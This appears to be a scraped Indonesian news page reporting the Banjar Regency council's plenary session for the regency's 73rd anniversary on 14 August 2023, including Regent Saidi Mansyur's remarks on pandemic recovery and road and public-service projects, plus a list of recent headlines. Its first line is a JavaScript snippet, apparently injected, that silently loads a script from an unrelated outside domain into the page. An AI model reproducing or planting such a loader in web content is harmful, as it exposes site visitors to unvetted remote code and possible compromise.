(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Hari Jadi Kabupaten Banjar, Saidi Mansyur Nyatakan Masih Banyak Tugas yang Harus Dikerjakan


KANALKALIMANTAN.COM, MARTAPURA –  Rapat Paripurna DPRD Banjar bergendakan Peringatan Hari Jadi ke 73 Kabupaten Banjar Tahun 2023, digelar Senin (14/8/2023) pagi.

Rapat tersebut dipimpin Ketua DPRD Banjar HM Rofiqi dihadiri para undangan dari Pemkab Banjar, legislatif, dan tokoh masyarakat Kabupaten Banjar.

Bupati Banjar H Saidi Mansyur mengungkapkan, rasa syukur perayaan Hari Jadi Kabupaten Banjar kali ini dapat berlangsung tanpa harus mengenakan masker dan protokol kesehatan ketat seperti tahun-tahun sebelumnya.

Baca juga: Pimpin Peringatan Hari Jadi Kabupaten Banjar, Saidi Mansyur Beberkan Keberhasilan

“Hal ini menandakan bahwa masa sulit pandemi dan berbagai tantangan telah kita lewati bersama dan aktivitas pemerintahan serta kehidupan masyarakat telah pulih dan kembali normal,” ungkap dia.

Menurut Saidi, meski diawal pemerintahannya fokus pada penanganan pandemi Covid-19, banyak proyek pembangunan yang telah dilakukan.

Masih terdapat banyak tugas yang harus dikerjakan bersama untuk mewujudkan visi Kabupaten Banjar yang Maju, Mandiri dan Agamis (MANIS).

“Tema peringatan Hari Jadi tahun ini Banjar Bangkit, Tangguh Maju Bersama Masyarakat mengajak kita untuk terus bersatu dan bekerja keras demi mewujudkan kemajuan yang berkelanjutan,” ucap Saidi.

Baca juga: Lantik Kabid Pencatatan Sipil, Sekda HSU Minta Pelayanan Cepat ke Masyarakat

Dalam upaya mewujudkan visi tersebut, Pemerintah Kabupaten Banjar telah melakukan percepatan pembangunan infrastruktur untuk meningkatkan konektivitas antarwilayah.

“Proyek pembangunan jalan dan jembatan telah kami laksanakan dengan tekad untuk memberikan akses yang lebih baik kepada masyarakat, aspek pelayanan publik dan penyelenggaraan pemerintahan yang efisien, seperti yang tercermin dari pendirian Mal Pelayanan Publik dan Plaza Pelayanan Publik di beberapa Kecamatan,” tambah dia.

HM Rofiqi didampingi wakilnya dan Sekretaris Dewan, turut hadir Wakil Bupati Habib Idrus Al Habsyie, Sekda HM Hilman, para Asisten dan Staf Ahli Bupati, Ketua TP PKK Hj Nurgita Tiyas, para Kepala SKPD, Forkopimda, anggota DPRD Banjar dan sejumlah undangan.

Baca juga: Tiga Terdakwa Kasus Korupsi Bendungan Tapin Tak Hadirkan Saksi Meringankan

Dalam kesempatan tersebut dilaksanakan penyerahan tali asih kepada Anggota Legiun Veteran oleh Ketua DPRD dan Bupati Banjar. (Kanalkalimantan.com/diskominfobanjar/kk)

Reporter: kk
Editor: Dhani


Risa

Recent Posts

Peresmian Masjid Raya Syekh Muhammad Arsyad Al-Banjari Ditarget pada Agustus 2024

KANALKALIMANTAN.COM, BANJARBARU - Melalui Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Pemerintah Provinsi Kalimantan Selatan… Read More

4 jam ago

Minus PPP, Upaya Lisa Halaby Cari Parpol Pengusung Berakhir di PDI P

KANALKALIMANTAN.COM, BANJARBARU - Figur non partai politik (Parpol) Lisa Halaby menutup lawatan politik ke Partai… Read More

5 jam ago

Evaluasi Aplikasi Smart Kampung Manis, DKISP Banjar Gelar Rakor

KANALKALIMANTAN.COM, MARTAPURA - Rapat koordinasi (rakor) Aplikasi Smart Kampung Manis, digelar Dinas Komunikasi Informatika Statistik… Read More

5 jam ago

Lepas Keberangkatan Jemaah Haji Asal Kabupaten Banjar, Ini Pesan Plt Kabag Kesra

KANALKALIMANTAN.COM, MARTAPURA - Jemaah calon haji asal Kabupaten Banjar yang berjumlah 97 orang dan ditambah… Read More

5 jam ago

Dansatgas TMMD Tinjau Kebun Tanaman Holtikultura Desa Karias Dalam

KANALKALIMANTAN.COM, AMUNTAI – Di tengah pelaksanaan program TNI Manunggal Membangun Desa (TMMD) ke-120, Komandan Kodim… Read More

5 jam ago

Air Zamzam Jemaah Haji Embarkasi Banjarmasin Tiba di Asrama Haji

KANALKALIMANTAN.COM, BANJARBARU - Ribuan galon air zamzam yang diperuntukan bagi jemaah haji Embarkasi Banjarmasin tahun… Read More

7 jam ago

This website uses cookies.